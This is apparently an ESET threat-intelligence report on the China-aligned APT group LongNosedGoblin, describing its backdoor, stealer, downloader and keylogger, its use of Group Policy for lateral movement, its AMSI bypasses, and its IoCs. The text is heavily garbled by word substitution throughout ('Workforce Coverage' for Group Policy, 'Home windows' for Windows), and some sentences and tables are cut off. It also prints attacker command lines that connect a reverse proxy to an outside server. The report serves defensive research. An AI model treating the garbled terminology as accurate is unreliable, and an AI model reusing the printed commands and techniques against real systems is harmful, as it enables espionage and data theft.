In 2024, ESET researchers spotted in the past undocumented malware within the community of a Southeast Asian governmental entity. This led us to discover much more new malware at the identical gadget, none of which had really extensive ties to any in the past tracked risk actors. In accordance with our findings, we made up our minds to characteristic the malicious equipment to a brand new China-aligned APT staff that we have got named LongNosedGoblin.
The gang employs a various customized toolset consisting basically of C#/.NET packages, and, significantly, makes use of Workforce Coverage to deploy its malware and transfer laterally around the programs of centered entities. This blogpost main points our discovery of LongNosedGoblin, is going over its identified campaigns, and dives into the toolset of the crowd.
Key issues of the record:
- LongNosedGoblin is a newly found out China-aligned APT staff concentrated on governmental entities in Southeast Asia and Japan, with the objective of cyberespionage.
- The gang has been lively since a minimum of September 2023.
- LongNosedGoblin makes use of Workforce Coverage to deploy malware around the compromised community, and cloud services and products (e.g., Microsoft OneDrive and Google Force) as command and keep an eye on (C&C) servers.
- One of the most staff’s equipment, NosyHistorian, is used to collect browser historical past and make a decision the place to deploy additional malware, such because the NosyDoor backdoor.
- NosyDoor is in all probability being shared by means of more than one China-aligned risk actors.
- We offer an in depth research of NosyHistorian, NosyDoor, NosyStealer, NosyDownloader, NosyLogger, and different equipment utilized by LongNosedGoblin.
Smells like bother: Introducing LongNosedGoblin
LongNosedGoblin is a China-aligned APT staff that objectives governmental entities in Southeast Asia and Japan, with the objective of engaging in cyberespionage. As we already discussed: in its campaigns, LongNosedGoblin abuses Workforce Coverage – a mechanism for managing settings and permissions on Home windows machines, in most cases used with Energetic Listing – to deploy malware and transfer laterally around the compromised community.
One of the most major equipment in its arsenal is NosyHistorian, a C#/.NET software that the crowd makes use of to assemble browser historical past, which is then used to decide the place to deploy additional malware. This comprises every other primary LongNosedGoblin instrument, a backdoor that we named NosyDoor, which, in campaigns we noticed, used Microsoft OneDrive as its C&C server. NosyDoor additionally employs living-off-the-land ways in its execution chain, particularly AppDomainManager injection. In any case, a number of of the crowd’s equipment can bypass the Antimalware Scan Interface (AMSI), which allows antimalware merchandise to scan more than a few scripts earlier than execution.
Discovery
In February 2024, we discovered unknown malware on a gadget of a governmental entity in Southeast Asia. The malware used to be used to drop a customized backdoor, which we later named NosyDoor. On the identical time, we spotted that the compromise concerned no longer only one, however more than one machines from the similar entity, with the malware having been deployed by way of Workforce Coverage.
Further research printed that the similar sufferers had been additionally with a unique malicious instrument allotted by way of Workforce Coverage, this one used for amassing browser historical past. We named the instrument NosyHistorian. Whilst we discovered many sufferers suffering from NosyHistorian during our unique investigation between January and March 2024, just a small subset of them had been compromised by means of NosyDoor. Some samples of NosyDoor’s dropper even contained execution guardrails to restrict operation to precise sufferers’ machines.
Later, we known much more unknown malware at the sufferers’ machines: NosyStealer, which exfiltrates browser information; NosyDownloader, which downloads and runs a payload in reminiscence; NosyLogger, a keylogger; different equipment like a opposite SOCKS5 proxy; and a controversy runner (a device that runs an software handed as a controversy) that used to be used to run a video recorder, most likely FFmpeg, to seize audio and video. The downloader used to be first recorded in our telemetry way back to September 2023.
Attribution
Because of the original toolset, along the usage of Workforce Coverage for lateral motion, we made up our minds to characteristic the assaults to a brand new China-aligned APT staff, and named it LongNosedGoblin. We spotted some overlap within the report paths discussed in a Kaspersky blogpost about ToddyCat process, an APT staff with equivalent concentrated on, however the malware in that record lacks code similarity with the malware thought to be right here.
It will have to even be famous that during June 2025, the Russian cybersecurity corporate Sun revealed a blogpost on an APT staff it refers to as Erudite Mogwai, which used a payload that intently resembles LongNosedGoblin’s NosyDoor. In step with the authors, Erudite Mogwai centered the IT infrastructure of a Russian executive group and Russian IT corporations, the usage of the LuckyStrike Agent backdoor in its operations.
Then again, we can not verify that Erudite Mogwai and LongNosedGoblin are one and the similar, as there’s a particular distinction in TTPs between the 2 teams. Significantly, the Erudite Mogwai analysis does no longer point out the abuse of Energetic Listing Workforce Coverage for malware deployment – one way this is reasonably explicit to LongNosedGoblin’s operations.
We later known every other example of a NosyDoor variant concentrated on a company in an EU nation, as soon as once more using other TTPs, and the usage of the Yandex Disk cloud carrier as a C&C server. The usage of this NosyDoor variant means that the malware could also be shared amongst more than one China-aligned risk teams. That is additional corroborated by means of Sun’s statement of the phrase Paid within the PDB trail of NosyDoor, suggesting that the malware could also be commercially supplied as a carrier – doubtlessly indicating it’s being offered or authorized to different risk actors.
Later campaigns
All over 2024, LongNosedGoblin used to be actively deploying NosyDownloader in Southeast Asia. In December of the similar yr, we detected an up to date model of NosyHistorian in Japan, however then noticed no next process.
In September 2025, we started seeing renewed process of the crowd in Southeast Asia. As in earlier campaigns, the risk actor leveraged Workforce Coverage to ship NosyHistorian to centered machines.
All the way through this wave of assaults, we spotted conduct in line with Cobalt Strike utilization: a loader named oci.dll used to be downloaded on a unmarried system, with a payload named ocapi.edb loaded from disk. LongNosedGoblin then therefore deployed the prospective Cobalt Strike loader to chose machines by way of Workforce Coverage.
Moreover, we noticed that every other equivalent part, mscorsvc.dll, used to be downloaded, with its payload saved in conf.ini. This loader used to be then deployed to sufferers’ machines the usage of Workforce Coverage, using the similar supply mechanism as oci.dll.
Nosing round: LongNosedGoblin’s toolset
NosyHistorian
NosyHistorian is a C#/.NET software with a self-explanatory inner title GetBrowserHistory, because it, certainly, collects browser historical past. Within the noticed campaigns, the attackers used this instrument to achieve perception in regards to the machines within the compromised infrastructure. In accordance with this data, they picked a small subset of explicit sufferers to compromise additional with their NosyDoor backdoor.
We noticed the instrument being deployed by way of Workforce Coverage underneath the filename Historical past.ini, disguising the report as an INI report. Actually, it is a transportable executable (PE) report, with the objective in all probability being to mix in with different INI information repeatedly saved within the Workforce Coverage cache listing.
NosyHistorian iterates over all customers at the system and retrieves the browser historical past from Google Chrome, Microsoft Edge, and Mozilla Firefox. Each and every historical past database report is copied to a short lived listing after which uploaded to a selected hardcoded SMB percentage inside the native community of the compromised group. NosyHistorian’s filename for every internet browser’s historical past report is indexed in Desk 1, the place
Desk 1. Crafted historical past filenames by means of NosyHistorian
| Internet browser | Filename |
| Google Chrome | |
| Microsoft Edge | |
| Mozilla Firefox |
Each this instrument and NosyDoor have equivalent PDB paths and had been compiled from the E:Csharp listing, with the NosyHistorian PDB trail being: E:CsharpSharpMiscGetBrowserHistoryobjDebugGetBrowserHistory.pdb.
NosyDoor
As said in the past, the NosyDoor backdoor makes use of cloud services and products, reminiscent of Microsoft OneDrive, for its C&C server. The malware has a slightly simple, three-stage chain of execution, depicted in Determine 1. The primary degree is a dropper that deploys the second one degree, which comes to a living-off-the-land assault the usage of the AppDomainManager injection method, which is in flip used to execute the ultimate payload, the backdoor itself.
NosyDoor collects metadata in regards to the sufferer’s system, together with the system title, username, the OS model, and the title of the present procedure, and sends all of it to the C&C. It then retrieves and parses activity information with instructions from the C&C. The instructions permit it to exfiltrate information, delete information, and execute shell instructions, amongst different issues.
NosyDoor Level 1 – dropper
The malware’s first degree is a dropper, in particular a C#/.NET software with the interior title OneClickOperation. Identical as NosyHistorian, it’s deployed by way of Workforce Coverage. We have now observed the dropper masquerade as a Registry Coverage report by means of the usage of the filename Registry.pol, even if we additionally noticed Registry.plo, which is rare (it is usually a typo, or perhaps the risk actors didn’t need the filename to battle with every other malicious report).
The dropper base64 decodes embedded information and decrypts them by way of Knowledge Encryption Same old (DES) with each key and initialization vector set to UevAppMo (the primary 8 bytes of the string UevAppMonitor), then drops them to C:WindowsMicrosoft.NETFramework with the next filenames:
- SharedReg.dll
- log.cached
- netfxsbs9.hkf
- UevAppMonitor.exe.config
Those filenames had been selected intentionally to mix in with current information, for the reason that listing in most cases accommodates information named SharedReg12.dll and netfxsbs12.hkf.
In its last steps, the dropper creates and begins a Home windows scheduled activity with the title OneDrive Reporting Process-S-1-5-21-
The more recent samples additionally come with an execution guardrail that makes the dropper serve as handiest on sufferers’ computer systems with a selected system title (see Determine 2).
NosyDoor Level 2 – AppDomainManager injection
UevAppMonitor.exe is a valid C#/.NET software, which the malware copied from the C:WindowsSystem32 to the C:WindowsMicrosoft.NETFramework listing and used as a living-off-the-land binary, or LOLBin. Residing-off-the-land assaults abuse professional equipment already provide at the gadget. On this case, the applying is used to cause AppDomainManager injection by way of a configuration report. This system could make packages constructed within the .NET framework load malicious code as an alternative of the supposed professional code by means of applying the AppDomainManager magnificence.
When the applying is performed, it lots the configuration report proven in Determine 3, which makes the applying name the InitializeNewDomain approach of the customized SharedReg magnificence in SharedReg.dll. The configuration additionally units the
SharedReg.dll accommodates code to circumvent AMSI, from an open-source AV/EDR evasion framework referred to as inceptor. Rather than that, it base64 decodes the report netfxsbs9.hkf, decrypts the end result by way of AES with key UevAppMonitor, padded with null bytes till its duration is 16, initialization vector 0, and ultimately base64 decodes the end result once more. The result’s NosyDoor, which is then performed. Any mistakes are written to the report error.txt within the C:WindowsMicrosoft.NETFramework listing.
NosyDoor Level 3 – payload
NosyDoor’s 3rd degree, the principle payload, is a C#/.NET backdoor with the interior title OneDrive and with PDB trail E:CsharpThomasServerThomasOneDriveobjReleaseOneDrive.pdb. As this title suggests, the backdoor makes use of cloud services and products, on this case Microsoft OneDrive, as a C&C server.
The total record of metadata the backdoor collects is composed of the next:
- exterior IPv4 deal with,
- native IPv4 deal with,
- agent ID,
- username,
- system title,
- present listing,
- present procedure (title, ID, structure),
- degree 3 native get started time,
- present native time,
- OS model,
- CodeType (see Desk 3), and
- AgentType (see Desk 3).
All accumulated metadata is encrypted by way of RSA after which uploaded to OneDrive because the report Read_
Each and every activity report accommodates an encrypted command, which is encapsulated with values taken from the backdoor’s configuration:
The command is then decoded with base64 and decrypted by way of AES with key
Desk 2. Instructions supported by means of NosyDoor
| Command | Description |
| CMD_TYPE_SHELL | Execute a shell command. |
| CMD_TYPE_EXEC_ASM | Load a .NET meeting. |
| CMD_TYPE_EXIT | Give up NosyDoor. |
| CMD_TYPE_REMOVE | Delete a report and record its unique listing. |
| CMD_TYPE_DOWNLOAD | Exfiltrate a report. Notice that obtain and add instructions are right here named on the subject of the attacker’s standpoint, treating the C&C system because the native system and the sufferer system because the faraway one. |
| CMD_TYPE_UPLOAD | Add a report to the sufferer’s system, delete it from OneDrive, and record the listing the place the report used to be uploaded. |
| CMD_TYPE_DRIVES | Get names and sizes of logical drives provide at the system. |
| CMD_TYPE_FILE_BROWSE | Download a listing checklist, together with report icons. |
| CMD_TYPE_SLEEP | Set the beaconing period. |
| CMD_TYPE_TASKSCHEDULER | Now not carried out. |
| CMD_TYPE_Plugin | Load a .NET meeting, at once calling the process Plugin.Run. |
After executing the command, NosyDoor plays the opposite steps – encrypts command output the usage of AES, encodes with base64, and encapsulates with the strings
If an exception happens all the way through NosyDoor’s operation, the backdoor writes the exception message at the side of the native time to C:UsersPublicLibrariesthomas.log.
The backdoor accommodates a customized dependency named Library this is embedded as a useful resource by means of the usage of Costura. It basically accommodates code associated with command processing, Microsoft OneDrive communique, and more than a few helper strategies, whilst the principle binary handles the beaconing loop and reads a config report, using the library.
The configuration is saved within the report log.cached in encrypted shape. NosyDoor decrypts it by way of XOR with key SecretKey, base64 decodes it, then decrypts it by way of AES with key Thomas, stuffed with null bytes till its duration is 16, and IV 0. This configuration may also be observed in Determine 4.
{
"ListenerID": 3,
"FolderName": "Duis euismod, mi, ligula, mattis feugiat, pulvinar.",
"AppID": "[redacted]",
"RefreshToken": "[redacted]",
"BaseUrl": "https://graph.microsoft.com/v1.0/pressure",
"TokenUrl": "https://login.microsoftonline.com/not unusual/oauth2/v2.0/token",
"CodeType": ".NET40",
"AgentType": "OneDrive",
"Scope": "offline_access information.readwrite",
"Sleep": 66,
"BeginDate": "08:51:00",
"EndDate": "18:51:00",
"Payload": {
"Key": "583oq23aonxloet7",
"MetaDataName": null,
"TaskFolderName": "Risus blandit mattis",
"ReceiveFolderName": "Felis posuere at",
"Prepend": "
IIS Home windows Server
!["IIS"]("iisstart.png" "LongNosedGoblin tries to smell out governmental affairs in Southeast Asia and Japan")
",
"PayloadPrepend": "Fames",
"PayloadAppend": "Ipsum"
}
}Determine 4. Decrypted configuration (log.cached, beautified)
The configuration values
NosyStealer
NosyStealer is used to scouse borrow browser information from Microsoft Edge and Google Chrome. As illustrated in Determine 5, it has a four-stage chain of execution, with the stealer part being the final-stage payload.
NosyStealer Level 1 – DLL loader
The primary degree (pmp.exe) within the NosyStealer chain is a C/C++ software. The noticed pattern merely lots a library named SERV.dll from disk and calls the exported serve as Hi.
NosyStealer Level 2 – injector
We noticed two NosyStealer Level 2 samples – one (SERV.dll) in our telemetry, and the opposite (msi.dll) uploaded to VirusTotal from Malaysia. Neither has the exported serve as Hi however each have the principle code in DllMain, i.e., the malicious code is administered proper after the DLL is loaded. They have got the next exports:
- ??0Cv2dllnoinject@@QEAA@XZ
- ??4Cv2dllnoinject@@QEAAAEAV0@$$QEAV0@@Z
- ??4Cv2dllnoinject@@QEAAAEAV0@AEBV0@@Z
- ?fnv2dllnoinject@@YAHXZ
- ?nv2dllnoinject@@3HA
The following-stage information is loaded from the hardcoded trail C:ProgramDataMicrosoftWDFMDE.dat. It’s decrypted by way of a single-byte XOR cipher with key 0x7A. The result’s Donut shellcode this is injected into the working pmp.exe procedure (NosyStealer Level 1) the usage of the CreateRemoteThread API within the SERV.dll case, and right into a newly created notepad.exe procedure the usage of the SetThreadContext API within the msi.dll case.
NosyStealer Level 3 – loader
As discussed within the NosyStealer Level 2 – injector phase, this degree is shellcode containing an embedded PE report this is decrypted, loaded, and performed in reminiscence the usage of Donut’s reflective loader. The extracted binary is a C/C++ software.
Like NosyDoor Level 2 – AppDomainManager injection, this degree makes use of a identified approach to bypass AMSI. It patches the AmsiScanBuffer serve as within the loaded amsi.dll with code that returns E_INVALIDARG (see Determine 6).
Then it creates a Home windows scheduled activity with the title Day-to-day Test Process that runs C:ProgramDataMicrosoftWDFpmp.exe (NosyStealer Level 1) on a daily basis with permissions of the native gadget account.
After patching the AMSI serve as and persisting, it continues in a similar fashion to the former degree – it decrypts the following degree from the hardcoded trail C:ProgramDataMicrosoftWDFmfd.dat by way of a single-byte XOR cipher with key 0x7A, the place the ensuing blob is every other Donut shellcode, which is then performed.
NosyStealer Level 4 – payload
Once more, like NosyStealer Level 3 – loader, this degree is shellcode that decrypts, lots, and executes an embedded PE report in reminiscence the usage of Donut’s reflective loader. This time, the extracted binary is a Pass software that steals browser information from the Microsoft Edge and Google Chrome internet browsers. To take action, it downloads a report named config from Google Doctors. When the report accommodates a sufferer’s ID, NosyStealer reads Microsoft Edge and Google Chrome profile information, archives it with tar, and encrypts it with a customized cipher.
NosyStealer then exfiltrates the encrypted tar archive to Google Force. Determine 7 is an instance of the JSON-formatted configuration, embedded within the binary, required to get admission to Google Force and Google Doctors.
{
"sort": "service_account",
"project_id": "dev0-411506",
"private_key_id": "[redacted]",
"private_key": "[redacted]",
"client_email": "dev0-660@dev0-411506.iam.gserviceaccount.com",
"client_id": "[redacted]",
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://oauth2.googleapis.com/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_x509_cert_url":
"https://www.googleapis.com/robotic/v1/metadata/x509/dev0-660p.c40dev0-411506.iam.gserviceaccount.com",
"universe_domain": "googleapis.com"
}Determine 7. NosyStealer configuration
NosyStealer additionally information mistakes and standing messages to a Google Doctors report named log, which might come with knowledge from multiple sufferer. The standing message comprises the consistent 9, perhaps a sign of the NosyStealer model. The total standing message structure, the place
NosyDownloader
Inspecting ESET telemetry information, we additionally discovered within the networks compromised by means of LongNosedGoblin more than a few firstly benign packages that were patched with malicious code. This code accommodates a downloader that we named NosyDownloader, which executes a series of obfuscated instructions handed to a spawned PowerShell procedure as one lengthy command line argument, which means that the script isn’t saved on disk. Each and every next degree is encoded with base64, the place the ultimate one is moreover deflated with gzip.
Each and every degree is in short described in Desk 3. Like NosyDoor Level 2 and NosyStealer Level 3, the second one degree right here additionally bypasses AMSI. On this case, NosyDownloader makes use of Matt Graeber’s mirrored image approach and disabling script logging ways made to be had on GitHub to circumvent AMSI.
Desk 3. NosyDownloader script levels
| Level | Description |
| 1 | Decodes and executes Level 2 in a newly created PowerShell procedure that runs in a hidden window. |
| 2 | Bypasses AMSI, then decodes and executes Level 3. |
| 3 | Decodes, decompresses, and executes Level 4. |
| 4 | Downloads a payload and executes it in reminiscence with Invoke-Expression. |
We suspect that NosyDownloader used to be used to deploy ReverseSocks5, NosyLogger, and a controversy runner, as we noticed them within the span of 1 week after NosyDownloader used to be performed.
NosyLogger
We additionally known a C#/.NET keylogger that we named NosyLogger. It sort of feels to be a changed model of the open-source keylogger DuckSharp, with the principle variations being that it doesn’t ship emails or translate logged keys into the Cyrillic alphabet.
The malware first of all tests whether or not a debugger is provide by way of the IsDebuggerPresent and CheckRemoteDebuggerPresent APIs; if no longer, it starts its keylogging capability.
Window title, pressed keys, and pasted clipboard content material are amassed in reminiscence. NosyLogger encrypts those information batches the usage of AES with the important thing D53FCC01038E20193FBD51B7400075CF7C9C4402B73DA7B0DB836B000EBD8B1C and a randomly generated initialization vector of mounted duration, the place the vector is appended to the encrypted batch of information. The encrypted information batch is then appended to the report on the hardcoded location C:WindowsTempTS_D418.tmp in hexadecimal string structure. In that report, every encrypted information batch is separated by means of a newline adopted by means of the string ENDBLOCK. This strategy of encrypting and storing amassed information to the report takes position each 10 seconds. This report isn’t exfiltrated by means of NosyLogger.
Different deployed equipment
ReverseSocks5
Amongst different malware deployed by means of LongNosedGoblin, we discovered an open-source opposite SOCKS5 proxy, written in Pass, referred to as ReverseSocks5. We found out it after we spotted the next command line arguments getting used:
-connect 118.107.234[.]29:8080 -psk “58fi04qQ” /F
The choice -psk is used to set a preshared key for encryption and authentication. The argument /F isn’t treated by means of ReverseSocks5 and is most certainly accidental; this argument is repeatedly used with schtasks create.
We then spotted every other set of command line arguments (which do not need the /F argument anymore):
-connect 118.107.234[.]29:8080 -psk “15Kaf22N3b”
This 2nd set corresponds to execution of ReverseSocks5, the place we noticed PowerShell because the father or mother procedure. NosyDownloader used to be additionally performed all the way through this time, indicating that the pattern used to be most certainly deployed with it.
Argument runner
This can be a C#/.NET software with inner title Binary; the only real objective of this instrument is to run an software handed as a controversy. We noticed the filename TCOEdge.exe as a part of the command line together with arguments which are explicit to the FFmpeg multimedia framework; it used to be used to report the display screen and seize audio, saving it to C:WindowsTempoutput.avi.
Conclusion
LongNosedGoblin is a China-aligned APT staff that objectives governmental entities in Southeast Asia and Japan. Our research of its campaigns printed a large number of items of customized malware, which the crowd makes use of to behavior cyberespionage towards its sufferers. Significantly, LongNosedGoblin employs Workforce Coverage to accomplish lateral motion inside the compromised community.
For any inquiries about our analysis revealed on WeLiveSecurity, please touch us at threatintel@eset.com.ESET Analysis gives non-public APT intelligence experiences and knowledge feeds. For any inquiries about this carrier, talk over with the ESET Risk Intelligence web page.
IoCs
A complete record of signs of compromise (IoCs) and samples may also be present in our GitHub repository.
Information
| SHA-1 | Filename | Detection | Description |
| 4E3F6E9D0F443F4C4297 |
Historical past.ini | MSIL/Secret agent.Agent.EUU | NosyHistorian. |
| CD745BD2636F607CC4FB |
Historical past.ini | MSIL/Secret agent.Agent.EUU | NosyHistorian. |
| 154A35DD4117DB760699 |
Registry.plo | MSIL/TrojanDropper |
NosyDoor degree 1. |
| B1D4A283A9CCC9E34993 |
Registry.pol | MSIL/TrojanDropper |
NosyDoor degree 1. |
| 77D2A8CB316B7A470E76 |
Registry.plo | MSIL/TrojanDropper |
NosyDoor degree 1. |
| F93E449C5520C4718E28 |
Registry.pol | MSIL/TrojanDropper |
NosyDoor degree 1. |
| 1959E2198D6F81B2604D |
SharedReg.dll | MSIL/Kryptik.AJBA | NosyDoor degree 2. |
| E0B44715BC4C327C04E6 |
N/A | MSIL/Agent.ESF | NosyDoor degree 3. |
| 43C8AE8561E7E3BF9CD7 |
N/A | MSIL/Agent.ESF | NosyDoor degree 3. |
| D11FC2D6159CB8BA392B |
N/A | MSIL/Agent.ESF | NosyDoor degree 3. |
| A0A80AC293645076EBAE |
pmp.exe | Win64/Agent.DNY | NosyStealer degree 1. |
| DDBBAE33E04A49D17DD2 |
SERV.dll | Win64/Agent.DNX | NosyStealer degree 2. |
| 60158C509446893B3B57 |
HPSupportAssistant |
PowerShell/TrojanDown |
NosyDownloader. |
| F5B7440EE25116A49EC5 |
RTLWVern.exe | PowerShell/Agent.BDR | NosyDownloader. |
| 85939C56BFCACD0993E6 |
hpSmartAdapter.exe | Win32/Agent.AGIJ | NosyDownloader. |
| C66F9FEC0F8CBF577840 |
hputils.exe | Win32/Agent.AGII | NosyDownloader. |
| 4C2FCCE3BAB4144D90C7 |
IGCCSvc.exe | MSIL/Secret agent.Key |
NosyLogger. |
| 161A25CB0B8FA998BF1B |
AdobeHelper.exe | WinGo/ReverseShell.DX | ReverseSocks5. |
| 4D61A9FBBCC4F7A37BE2 |
msi.dll | Win64/Agent.DOT | NosyStealer degree 2. |
| 5AE440805719250AAEFE |
TCOCertified.exe | MSIL/Runner.BW | Argument runner. |
| E93D32C739825519A10A |
N/A | WinGo/PSW.Agent.FZ | NosyStealer degree 4. |
| 212126896D38C1EE5732 |
N/A | Win32/Agent.AGHB | NosyStealer degree 3. |
| CFFE15AA4D0F9E6577CC |
HPNDFInterface.exe | PowerShell/TrojanDown |
NosyDownloader. |
| 6AC22CE60B706E3B9A79 |
bemsvc.exe | PowerShell/TrojanDown |
NosyDownloader. |
| 2C1959DD85424CEDC96B |
HPDeviceCheck.exe | Win32/Agent.AGWU | NosyDownloader. |
| 46107B1292B830D9BCEB |
HP.OCF.exe | Win32/Patched.NLL | NosyDownloader. |
| 581464978C29B2BC79C6 |
HP.OCF.exe | Win32/Patched.NLL | NosyDownloader. |
| 0D91A0E52212EC44E32C |
ax_installer.exe | PowerShell/TrojanDown |
NosyDownloader. |
| 48D715466857FB0C6CD0 |
btdevmanager.exe | MSIL/Secret agent.Keylogger |
NosyLogger. |
| 563677CFACD328EA2478 |
information.txt | MSIL/Secret agent.Agent.EUU | NosyHistorian. |
| AC2264C56121141DAF75 |
ntrtscan.exe | MSIL/Secret agent.Agent.EUU | NosyHistorian. |
| 70A615BC580522E1EEE4 |
ntrtscan.exe | MSIL/Secret agent.Agent.EUU | NosyHistorian. |
| E9C5E4AA335DFBD25786 |
oci.dll | Win64/Kryptik_A |
Loader of unknown malware (perhaps Cobalt Strike). |
| EC9CEB599DF3BDFFAD53 |
mscorsvc.dll | Win64/Kryptik.EHP | Loader of unknown malware (perhaps Cobalt Strike). |
Community
| IP | Area | Internet hosting supplier | First observed | Main points |
| 118.107.234[.]26 | www.sslvpn |
IRT‑IPSERVERONE‑MY | 2022‑04‑09 | NosyDownloader C&C server. |
| 103.159.132[.]30 | www.thread |
IRT-FBP-MY | 2023‑10‑03 | NosyDownloader C&C server. |
| 101.99.88[.]113 | www.blaze |
Shinjiru Generation Sdn Bhd | 2024‑08‑23 | NosyDownloader C&C server. |
| 118.107.234[.]29 | N/A | IRT‑IPSERVERONE‑MY | 2023‑03‑20 | ReverseSocks5 server. |
| 101.99.88[.]188 | www.privateness |
Shinjiru Generation Sdn Bhd administrator | 2024‑10‑23 | NosyDownloader C&C server. |
| 38.54.17[.]131 | N/A | Kaopu Cloud HK Restricted | 2025‑03‑05 | Server web hosting malware, perhaps Cobalt Strike. |
MITRE ATT&CK ways
This desk used to be constructed the usage of model 18 of the MITRE ATT&CK framework.
| Tactic | ID | Identify | Description |
| Useful resource Building | T1585.003 | Determine Accounts: Cloud Accounts | LongNosedGoblin created accounts on cloud-based services and products for C&C communique. |
| T1588.001 | Download Features: Malware | LongNosedGoblin most likely used shared malware that we named NosyDoor. | |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | NosyDownloader executes PowerShell instructions. |
| T1059.003 | Command and Scripting Interpreter: Home windows Command Shell | NosyDoor might execute instructions by way of cmd.exe. | |
| T1106 | Local API | NosyStealer Level 1 executes the following degree by way of the LoadLibraryW API. | |
| Patience | T1053.005 | Scheduled Process/Task: Scheduled Process | NosyDoor and NosyStealer are continued the usage of Home windows scheduled duties. |
| T1574.014 | Hijack Execution Drift: AppDomainManager | NosyDoor Level 2 makes use of AppDomainManager injection to run malicious code. | |
| Protection Evasion | T1027.013 | Obfuscated Information or Data: Encrypted/Encoded Document | Malicious information embedded in NosyDoor Level 1 are encrypted by way of DES. |
| T1027.015 | Obfuscated Information or Data: Compression | NosyDownloader Level 4 is compressed the usage of gzip. | |
| T1622 | Debugger Evasion | NosyLogger does no longer function if a debugger is provide. | |
| T1480 | Execution Guardrails | Some samples of NosyDoor function handiest on machines with explicit names. | |
| T1564.003 | Conceal Artifacts: Hidden Window | NosyDownloader creates a PowerShell procedure with a hidden window. | |
| T1562.001 | Impair Defenses: Disable or Adjust Gear | NosyDoor Level 2, NosyStealer Level 3, and NosyDownloader bypass AMSI. | |
| T1036.005 | Masquerading: Fit Professional Identify or Location | NosyHistorian Level 1 used to be noticed with the title Registry.pol, masquerading as a Registry Coverage report. | |
| T1218 | Signed Binary Proxy Execution | NosyDoor Level 1 executes the following degree by means of leveraging the professional UevAppMonitor.exe. | |
| T1055 | Procedure Injection | One noticed NosyStealer Level 2 injects Level 3 to pmp.exe by way of CreateRemoteThread. The opposite noticed pattern injects to notepad.exe by way of SetThreadContext with ResumeThread. | |
| T1620 | Reflective Code Loading | Donut has been used to execute NosyStealer Level 3 and Level 4 in reminiscence. | |
| Discovery | T1217 | Browser Data Discovery | NosyHistorian collects browser historical past from Google Chrome, Microsoft Edge, and Mozilla Firefox. |
| T1083 | Document and Listing Discovery | NosyDoor can record information and directories. | |
| T1082 | Gadget Data Discovery | NosyDoor obtains gadget knowledge as a part of C&C beaconing. | |
| Assortment | T1056.001 | Enter Seize: Keylogging | NosyLogger logs keystrokes. |
| T1125 | Video Seize | LongNosedGoblin has used video recording device, most likely FFmpeg, to seize audio and video. | |
| T1560 | Archive Gathered Knowledge | NosyLogger encrypts accumulated information by way of AES. | |
| T1074.001 | Knowledge Staged: Native Knowledge Staging | NosyLogger shops pressed keys, window names, and clipboard content material to a report at a hardcoded trail. | |
| Command and Regulate | T1071.001 | Utility Layer Protocol: Internet Protocols | NosyDownloader makes use of HTTP to obtain additional payload. |
| T1105 | Ingress Software Switch | NosyDoor and NosyDownloader can obtain and run next payloads. | |
| T1102.002 | Internet Provider: Bidirectional Communique | NosyDoor makes use of Microsoft OneDrive as its C&C server. NosyStealer makes use of Google Doctors to obtain a cause command and to ship debug messages, and Google Force to exfiltrate browser information. | |
| T1573.001 | Encrypted Channel: Symmetric Cryptography | NosyDoor encrypts C&C command outputs by way of AES. | |
| T1573.002 | Encrypted Channel: Uneven Cryptography | NosyDoor makes use of RSA to encrypt metadata this is despatched to the C&C server. | |
| Exfiltration | T1567.002 | Exfiltration Over Internet Provider: Exfiltration to Cloud Garage | NosyStealer exfiltrates browser information to Google Force. |
